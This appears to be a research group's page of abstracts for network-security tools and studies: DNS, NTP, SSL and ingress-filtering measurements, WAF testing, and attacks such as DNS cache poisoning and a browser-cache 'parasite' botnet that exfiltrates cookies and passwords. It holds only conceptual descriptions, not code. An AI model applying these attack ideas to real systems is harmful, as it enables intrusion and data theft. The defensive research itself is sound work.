A framework to differentiate erroneous ROAs from prefix hijacks. It enables network operators to avoid blocking legitimate traffic and keep preventing prefix hijacking attacks. More details here: https://rose.smart-validator.net/
The Dependency Detective visualises the requests of any website. It is especially designed to check a website for third party dependencies. Privacy is a privilege. Third party dependencies can be used to track the behaviour of users. With the Dependency Detective you can check websites of your choice by your own. Additionally, there are statistics about the usage of third party dependencies over all so far crawled websites available. Dependency Detective has crawled initially the homepages of the top 100.000 websites of the Majestic Million list to ensure meaningful statistics. More details here: https://dependency-detective.cad.sit.fraunhofer.de/
DNS Cache Test – is a new tool for measuring DNS resolution platforms. Our tool identifies the different components in DNS resolution platforms, in particular, the IP addresses used for lookup of records in nameservers and the caches. We infer the number of caches used as well as the DNS software of the caches. Our tool utilises the caching behavior and the standard DNS protocol behavior for collection of the data and its analysis. More details here.
DNSSEC Dashboard – monitors DNSSEC deployment and typical misconfigurations among Top Level Domains and popular domains. More details here.
A framework aiming to help users check if their ISP are censoring / blocking some webpages, along with some interesting statistics and great visualzations.
This checks if a website is vulnerable to known SSL attacks.
More details here.
Transputation is a Transport Framework for Secure Computation. The tool makes it possible for developers to perform real life evaluations and receive immediate results without the need to install or use any traffic monitoring tools. Transputation can be accessed here.
The source code implementation of Transputation is available here.
Demonstrates how an off-path attacker can shift time on a victim system which uses time synchronisation using NTP by attacking the NTP clients DNS lookups. This includes a practical attack demonstration against various NTP implementations and even a theoretical attack scenario against an security-improved NTP client. More details here.
Based on a work in which we present novel methods to test if a network enables ingress filtering, that is to say, if it is vulnerable to IP spoofing attacks. Statistics as well domain troubleshooting are available online. (This work is still under submission.)
Pseudorandom Generators (PRGs) play an important role in security of systems and cryptographic mechanisms. Yet, there is a long history of vulnerabilities in practical PRGs. Significant efforts in the theoretical and practical research communities are invested to improve the security of PRGs, to identify faults in entropy sources, and to detect vulnerabilities allowing attacks against the PRGs. In this work we take an alternative approach at the pseudo-randomness generation problem. We design and implement Network Pseudo-randomness Collector (NPC) which collects pseudorandom strings from servers in the Internet. NPC does not require cooperation nor synchronisation of those servers. NPC is easy to use and integrate into the existing systems. We analyse the security of NPC and show how it addresses the main factors behind the vulnerabilities in current PRGs. More details here.
In this study, we test in-the-wild vulnerability of DNS resolvers in the internet against a newly discovered type of Cache Poisoning attacks which rely on misinterpretation of special characters \000 and \. which, despite popular belief of many developers, are actually allowed inside DNS labels per RFC6895. We provide selective statistics over various properties of the Resolvers we tested, like Autonomous System (AS), Country, Implementation and whether the resolver is detected as a forwarder or recursive resolver.
We identify and explore a new type of malicious script attacks: the persistent parasite attack. Persistent parasites are stealthy scripts, which persist for a long time in the browser’s cache. We show how to use the parasites to build a botnet that runs entirely in the browser and controlled by a remote attacker. Our attack does not require the victim to install software on the victim’s host. We implement a prototypical attacker that injects parasites into victim clients’ caches via TCP injection (when the attacker is connected to the same WiFi network as the victim) as well remotely by redirecting traffic to its hosts via DNS cache poisoning. Once the cache is infected, the parasites propagate to other popular websites on the victim client. We show how to design the parasites so that they stay long time in the victim’s cache under the attacker’s control, not restricted to the duration of the user’s visit to the web site. We then demonstrate how to leverage the parasites to perform sophisticated attacks against a range of applications. We devise covert channels for communication between the attacker and the parasites, which allows the attacker to control which scripts are executed and when, and to exfiltrate private information to the attacker, such as cookies and passwords. Finally we provide recommendations for countermeasures. More details here.
This is a research application for the automatic and periodic security evaluation of web application firewalls (WAFs).
WAFuzz can test the capabilities of WAFs to protect web applications
1. one-time to enable users to make qualified comparisons between different WAFs
2. periodically to make sure that WAFs continuously protect their web applications, also after system changes and updates.
It tests single or combined WAF configurations, perform predefined or own attacks against a vulnerable web server and analyzes if the WAF(s) prevented the attacks. It also generates reports with the relevant data, including raw requests and performance information. It supports also long-time random evaluations which permute evasive attack patterns to detect subtile attack holes. Additionally, it supports different combination modes to research the security of combined (different) WAFs.
This project is currently under active development by the Fraunhofer Institute for Secure Information Technology and not publicly available yet. If you are interested or have further questions, please contact WAFuzz. More details here.
CombiWAF is a research application for the robust combination of web application firewalls (WAFs) . The main idea is that every WAF has weaknesses in different fields and by combining them, we can increase the security of the protected web server. The system consists of two parts:
- The distributor receives incoming HTTP(S) requests from external clients and forwards them to multiple WAFs in parallel. The first response from a WAF is then returned to the external client.
- The combiner receives requests from the WAFs which they cleared to reach the protected web server. Depending on the configuration, the combiner decides whether a cleared request should be forwarded to the web server. If yes, then it forwards it, takes the web server’s response and send it back through one WAF.